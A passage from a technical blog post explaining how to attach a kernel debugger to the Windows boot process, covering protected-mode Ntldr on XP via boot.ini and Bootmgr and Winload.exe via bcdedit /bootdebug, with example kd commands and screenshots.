<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDZq8I5Q89YTl3pNcVHdIPr1jKh-usykmZTwr_bO01CO0-prSXdQHVg19V-DnfdldKIjMoIEJJYFtu-_ernQmNYOGQb-6TwCk2oJUepAtdYsnLw3udJfc8Xqd7XILtvjrSuOSWuSkZLKQ/s1600/201d8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDZq8I5Q89YTl3pNcVHdIPr1jKh-usykmZTwr_bO01CO0-prSXdQHVg19V-DnfdldKIjMoIEJJYFtu-_ernQmNYOGQb-6TwCk2oJUepAtdYsnLw3udJfc8Xqd7XILtvjrSuOSWuSkZLKQ/s1600/201d8.png" height="414" width="640" /></a></div>
<br />
Note that my Old IDA Pro (v6<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="2220cb26-099a-4673-b11a-ebb469e463d0" id="79489fb8-f1a4-427a-b56b-6393e2d7ec43">.</span>0) did not stop when execution reached at a magic_breakpoint, but this issue may have already been solved <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="2220cb26-099a-4673-b11a-ebb469e463d0" id="e9a3c56a-8822-4419-add3-87b55c0e5598">on</span> the latest version of IDA.<br />
<br />
<h4>
</h4>
<h4>
<br /><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="97f02cd4-dfe6-4d2c-a1f7-01242e48dcae" id="a790d666-6854-4fb0-99b1-572c36696674"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="f8caa334-b4c4-4195-85ce-6d05cc5ae8a4" id="6feb2948-d562-4281-abec-59da7ee7aedd"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="8bf2c4d5-9bf2-45e8-a5df-61166e9e75be" id="05d534c5-44a7-4658-a2c3-e881d9cf128f">Ntldr</span></span></span> (Protected-Mode)</h4>
<div>
Steps for debugging Ntldr (Protected-mode) is relatively straightforward:</div>
<div>
<ol>
<li>Download and extract <a href="http://www.microsoft.com/en-us/download/details.aspx?id=1260" target="_blank">Ntldr of the checked build version</a>. </li>
<li>Open the extracted Ntldr with a hex editor and find an 'MZ' <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="b3f4daca-032d-4d35-97ed-16513e388bbb" id="c3ec36e9-94c0-4ddb-bb34-ce082a285cbb">header</span> in it. Copy all contents after that and save it on a <u><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="4c85fd74-da01-4ff0-ac7a-a0a0f78951ad" id="fe051523-1370-4a47-8b69-d47b0f187d71"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="d2ba0afb-8373-4f37-8ef8-a29584f0d4b1" id="bcbdc0be-66c9-4e61-9629-95a5666bb4e2">debugger</span></span></u> system. We assume that you saved it as E:\osloader.exe in this article. This part contains protected mode code of Ntldr.</li>
<li>Overwrite existing C:\ntldr with the extracted <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="988157d6-99a3-494f-8a71-e31279e37483" id="0c4094d6-81be-4e88-8fc5-6581feb2ff6c"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="083fb86e-dff0-479c-9a7e-27db27ebd810" id="00e04d4c-d838-47fc-84ae-c7b310d6f481">Ntldr (not osloader.exe).</span></span></li>
<li>Add the following [debug] section in boot.ini.</li>
</ol>
</div>
<blockquote class="tr_bq">
<span style="font-size: x-small;">---- </span></blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;">[<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="d66dd8f3-4920-4d78-b6f4-49934d7a6715" id="d1996254-bb4d-4919-887b-f6981dc0e0cd"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="0f88900d-3462-414a-8557-b2f40c17cf11" id="61fc0d3e-ec9c-4fe0-b937-0f60d26430b2"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="c4166ae8-7201-4ba6-a336-d5385e74dfb1" id="5d0bc79c-9167-4bdb-ba59-855e69cadbf3">boot</span></span></span> loader]</span><br />
<span style="font-size: x-small;">timeout=30</span><br />
<span style="font-size: x-small;">default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS</span><br />
<span style="font-size: x-small;"><br />
<span style="color: red;">[<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="63abb64e-f01e-469d-8a11-c304c45a6ef0" id="41579fa8-23bd-40c3-a1ba-b0ecb02bf861"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="0e3f4be8-92a2-47dc-99cb-f1a5bf604ca3" id="664cfac1-078a-441d-afdb-6d6887421fe3">debug</span></span>]<br />/<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6cc975e2-37ac-4e3f-8e1f-d58d547b7d2f" id="c711060c-bbd0-4130-93ab-30eb221f2c91"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="95203047-21f0-4996-a73e-75c16d07745d" id="d5d6689b-9828-4fff-b8c2-7bf996e2f2ce">debug</span></span> /debugport=COM1: /baudrate=115200 /<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6cc975e2-37ac-4e3f-8e1f-d58d547b7d2f" id="77064a44-2dfa-4dd1-a931-6a5ba5aabca8"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="95203047-21f0-4996-a73e-75c16d07745d" id="c877e587-b081-4e22-b420-6b1381bc2c3c">debugstop</span></span></span></span><br />
<span style="font-size: x-small;"><br />
[<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="2056b65b-7f92-4df8-b874-08bb95113aa0" id="50d68749-a2b0-497b-9dc3-0ca86675e023"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="b153b62b-82be-4656-b370-31c6265a266a" id="fc332c50-06cf-43ba-9efb-bb1fd3cc4ca3">operating</span></span> systems]</span><br />
<span style="font-size: x-small;">multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="23a363ae-b133-452c-a57c-8b360171ce71" id="2ec4aa8e-a58b-4488-910b-416687392344"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6574ff15-8c85-4448-b297-fb8662d6b970" id="e7a810e0-bc5b-4d13-9287-531d5694c6dd">fastdetect</span></span></span><br />
<span style="font-size: x-small;">multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional (Debug)" /noexecute=optin /fastdetect /debug /debugport=COM1: /baudrate=115200</span></blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;">---- </span></blockquote>
Once you reboot the <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="a5829bb3-3658-4311-9ec7-22be5dd2dab0" id="eee1e7f7-3d84-4212-951a-5a901ad9c8fd"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="1ba7fe88-eb61-41f2-9bca-bc58736681e0" id="3faaecf3-2690-4959-8d44-ce9290e1af28">debugee</span></span> XP system, it waits to be connected by a kernel debugger. In order to load symbols and suppress error messages, you can manually read an osloader.exe image.<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">----<br /><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="43c08a24-be71-4995-a67b-b3584e236167" id="030fc213-5b5b-4e65-840c-f76ebe72cf90"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="b18969a5-81e9-4ff9-affa-59b0cb1374f0" id="b602a48a-5027-463d-bc2d-030960db249d">kd</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="43c08a24-be71-4995-a67b-b3584e236167" id="e214ef0c-b172-41d8-ad47-5b56accde29e"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="b18969a5-81e9-4ff9-affa-59b0cb1374f0" id="7283b4f9-02bc-44d1-a8f4-adbc2b5be6c0">> .</span></span>readmem E:\osloader.exe 0x400000 L0x1000<br />Reading 1000 bytes..<br /><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="db821359-1578-4ab9-898e-3abe024d471b" id="dc005b93-b7cc-47a0-b172-10d8183cabf2"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d8dd642-ff78-42a7-a9ac-2ee4b6aa9868" id="cf5730d4-84aa-4a4a-bdb2-65e049ec5894">kd</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="db821359-1578-4ab9-898e-3abe024d471b" id="59382282-0e72-4314-bbec-f6216bdb5477"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d8dd642-ff78-42a7-a9ac-2ee4b6aa9868" id="b13c6c44-d6a1-422e-8548-fa014c8f4916">> .</span></span><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="db821359-1578-4ab9-898e-3abe024d471b" id="269aa37e-2998-4f71-9f63-6ab23c944f52"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="6d8dd642-ff78-42a7-a9ac-2ee4b6aa9868" id="43d8b3f3-ddc1-4a12-997f-86faed5aebf8">imgscan</span></span> /l /r 00400000<br />MZ at 00400000 - size 80000<br /> Name: osloader.EXE<br /> Loaded osloader.EXE module<br />----</span></blockquote>
Now, you are free to see how Ntoskrnl.exe and <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="353a12f8-df43-43e0-b671-c485bc239f8e" id="a71dc028-af42-4d9f-a70b-c87e8b0cb8dc">boot</span> drivers are initialized.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc1d_JBw5FyXQ78EoyPaYiArc4S2X_ME15tX8X0_dTLQ7z_xRE-rydb_xfRHySk_okizyCwYv-1LIQch6o5EbHxaS1fLKTeRCrRhYYGYnH94_dtfKWWZOV1RlphJMZDhK8YUqMfllqFf8/s1600/Screen+Shot+2014-11-02+at+2.53.50+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc1d_JBw5FyXQ78EoyPaYiArc4S2X_ME15tX8X0_dTLQ7z_xRE-rydb_xfRHySk_okizyCwYv-1LIQch6o5EbHxaS1fLKTeRCrRhYYGYnH94_dtfKWWZOV1RlphJMZDhK8YUqMfllqFf8/s1600/Screen+Shot+2014-11-02+at+2.53.50+PM.png" height="459" width="640" /></a></div>
<br />
<h4>
<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="921851a2-849f-4824-8fce-ca0ccbd2c010" id="fbeef308-b007-4e53-8883-0fb7824e0464"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="4015d915-e1ca-4b0c-b410-34bb3662c26a" id="0520f596-d0af-4a6d-a0f9-57ae98fa0eee"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="f41013b3-8100-41e9-9c94-c73a85e69786" id="e6638765-0aea-4408-b9cc-cd05227bdab4">Bootmgr</span></span></span> (Protected-Mode)</h4>
<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="8e16b169-ee7a-4587-80e7-78ec808aba15" id="5181bd44-1163-422e-90c1-549498192531">Bootmgr</span> is called the boot manager and responsible for listing a boot menu and firing up an appropriate <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="8e16b169-ee7a-4587-80e7-78ec808aba15" id="0cbd2e46-629e-434e-aa51-a2d58360fca1">program according</span> to a user's selection in the list.<br />
<br />
Unlike debugging Ntldr, you can activate the boot <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="325e7b4d-fc0c-4d9e-9da3-845f747c6dc5" id="a22fa6bc-2d96-40a8-9ba1-2ca5dfbd6604">manager debugger</span> with the following commands.<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">----</span> </blockquote>
<blockquote>
<span style="font-size: x-small;"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="4ecf1650-807a-49b0-9b65-8b592f133409" id="ac0e68af-1cb5-447d-9c0e-5e0c6c00b13c">bcdedit</span> /<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="4ecf1650-807a-49b0-9b65-8b592f133409" id="09e7cad3-f684-4133-ac03-177fb90265ba">bootdebug</span> {bootmgr} on </span></blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;"></span><span style="font-size: x-small;">----</span></blockquote>
<div>
Fore more details, you can consult MSDN, <a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff542183(v=vs.85).aspx" target="_blank">BCDEdit /<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="3c314666-ff5b-4063-b5ac-7cea5c73ac83" id="56995889-b7ad-4b00-802e-8502c363b4e7">bootdebug</span></a>. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS9Q3W-i11zXrpLYqZOCmhS0a2XTd66w-QjdDXExfB2qvixeF3yZx7xSsx3snYHkQ_mYXYTYpJwdN85rcqpGNZuVL7qDFx2wbzNGH6Hjn5_wbCHV3_lixM6Pt6IvYfVaMmEhdP0OMctdA/s1600/Screen+Shot+2014-11-02+at+5.05.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS9Q3W-i11zXrpLYqZOCmhS0a2XTd66w-QjdDXExfB2qvixeF3yZx7xSsx3snYHkQ_mYXYTYpJwdN85rcqpGNZuVL7qDFx2wbzNGH6Hjn5_wbCHV3_lixM6Pt6IvYfVaMmEhdP0OMctdA/s1600/Screen+Shot+2014-11-02+at+5.05.11+PM.png" height="454" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Note that the executable file is located in C:\Windows\Boot\PCAT\bootmgr and contains a 32bit PE image as with Ntldr.</div>
<h4>
<br />Winload.exe</h4>
Winload.exe is called the boot loader and used for the regular boot procedure. It basically loads Ntoskrnl.exe and some other boot drivers. Enabling the boot loader debugger can be simply done with <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="94e322d7-dcfb-4814-8c79-221ae3b44f9c" id="22ccd7e1-809e-48e9-8d7c-301bc9ec56a8">bcdedit</span> like the case of Bootmgr.<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">----</span><span style="font-size: x-small;"> </span></blockquote>
<blockquote class="tr_bq">
<span style="font-size: x-small;"></span><span style="font-size: x-small;"><span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="e3e634c1-5543-41b9-9e55-59f9b6d173df" id="18df2126-ef8f-47b4-a756-dbb9dc069453">bcdedit</span> /<span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="e3e634c1-5543-41b9-9e55-59f9b6d173df" id="abd6aab2-4321-4c45-827b-05ae5b4a846b">bootdebug</span> on </span><span style="font-size: x-small;"><br /></span><span style="font-size: x-small;">----</span></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0p8wMqTnaT7NHxEMmrEjhYsl3-0fu2PjwNCmDzrtuNFsSpeksikgGeU3_OTUBa2jMPWJHKZzsTi6nKPJhebMkdAN1QrPI7GJeUh3-65z-cPPdW6HEo64QxShWSqA0ngqPAvOJWn3Xch0/s1600/Screen+Shot+2014-11-02+at+5.11.08+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0p8wMqTnaT7NHxEMmrEjhYsl3-0fu2PjwNCmDzrtuNFsSpeksikgGeU3_OTUBa2jMPWJHKZzsTi6nKPJhebMkdAN1QrPI7GJeUh3-65z-cPPdW6HEo64QxShWSqA0ngqPAvOJWn3Xch0/s1600/Screen+Shot+2014-11-02+at+5.11.08+PM.png" height="454" width="640" /></a></div>
<h4>
</h4>
<h3>
Further Research</h3>
<div>
<ul>
<li>Difference in Windows 10.</li>
<li>When the processor mode <span class="GINGER_SOFTWARE_mark" ginger_software_uiphraseguid="c3c5b68c-d1d4-487c-a5a1-58bae800ad87" id="5845d341-d606-4d51-a110-fae985ea5e1d">is changed</span> to the long mode on the x64 system.</li>
<li>QEMU may be better in terms of installing OSs in it. </li>
</ul>
</div>
<div>
<br />
<br /></div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com1